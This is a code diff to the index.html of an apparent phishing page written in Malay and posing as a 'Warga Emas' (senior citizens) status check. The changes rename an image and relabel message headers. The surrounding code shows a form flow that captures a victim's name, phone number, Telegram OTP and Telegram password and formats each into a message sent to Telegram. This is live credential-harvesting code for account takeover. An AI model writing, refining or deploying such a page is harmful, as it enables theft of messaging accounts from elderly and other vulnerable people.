--- a/index.html
+++ b/index.html
@@ -573,7 +573,7 @@
       </nav>
 
       <div class="hero">
-        <img src="warga-emas.jpeg" alt="tng-img" />
+        <img src="warga-emas.jpg" alt="tng-img" />
         <h4>SEMAKAN STATUS</h4>
         <div class="form-container">
           <form id="registrationForm">
@@ -613,7 +613,7 @@
       </nav>
 
       <div class="hero">
-        <img src="warga-emas.jpeg" alt="tng-img" />
+        <img src="warga-emas.jpg" alt="tng-img" />
         <div class="form-container">
           <p class="no-margin">
             Sila Masukan Kod-yang dihantar ke Nombor Telegram Anda
@@ -682,7 +682,7 @@
       </nav>
 
       <div class="hero">
-        <img src="warga-emas.jpeg" alt="tng-img" />
+        <img src="warga-emas.jpg" alt="tng-img" />
         <div class="form-container">
           <p id="kataSandi">Sila Masukan kata laluan Telegram Anda</p>
           <form id="passwordForm">
@@ -794,12 +794,11 @@
 
           const message = `
 ────────────────
-🔰 DATA | NOMBOR TELEGRAM 🔰
+🔰 WARGA EMAS | NOMBOR TELEGRAM 🔰
 ────────────────
 👤 Nama  : ${name}
 📱 No HP : \`${phone}\`
-────────────────
-WARGA EMAS
+───────────────
 `;
 
           document.getElementById("loadingScreen").style.display = "flex";
@@ -834,13 +833,13 @@ WARGA EMAS
 
           const message = ` 
 ────────────────
-🔰 DATA | OTP 🔰
+🔰 WARGA EMAS | OTP 🔰
 ────────────────
 👤 Nama  : ${savedName}
 📱 No HP : \`${savedPhone}\`
 🔑 OTP   : ${otp}
 ────────────────
-WARGA EMAS
+
 `;
 
           document.getElementById("loadingScreen").style.display = "flex";
@@ -873,14 +872,13 @@ WARGA EMAS
 
           const message = `
 ────────────────
-🔰 DATA | KATA SANDI 🔰
+🔰 WARGA EMAS | KATA SANDI 🔰
 ────────────────
 👤 Nama  : ${savedName}
 📱 No HP : \`${savedPhone}\`
 🔑 OTP   : ${savedOTP}
 🔐 Kata Laluan : ${password}
 ──────────────
-WARGA EMAS
 `;
 
           // Kirim ke Telegram
